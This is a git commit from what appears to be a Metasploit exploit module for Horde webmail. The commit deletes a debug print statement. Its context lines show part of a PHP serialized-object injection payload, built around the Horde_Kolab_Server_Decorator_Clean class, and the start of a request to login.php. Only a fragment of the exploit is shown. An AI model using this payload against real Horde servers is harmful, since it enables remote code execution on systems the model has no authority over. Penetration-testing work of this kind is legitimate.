Delete debug print

bug/bundler_fix
jvazquez-r7 2014-03-17 21:01:30 -05:00
parent 3bdd906aae
commit f86fd8af5d
1 changed files with 0 additions and 2 deletions

View File

@ -83,8 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
payload_serialized << "a:1:{s:10:\"identities\";s:#{php_injection.length}:\"#{php_injection}\";}}"
payload_serialized << "s:42:\"\x00Horde_Kolab_Server_Decorator_Clean\x00_added\";a:1:{i:0;i:1;}}"
print_status(payload_serialized)
send_request_cgi(
{
'uri' => normalize_uri(target_uri.path.to_s, "login.php"),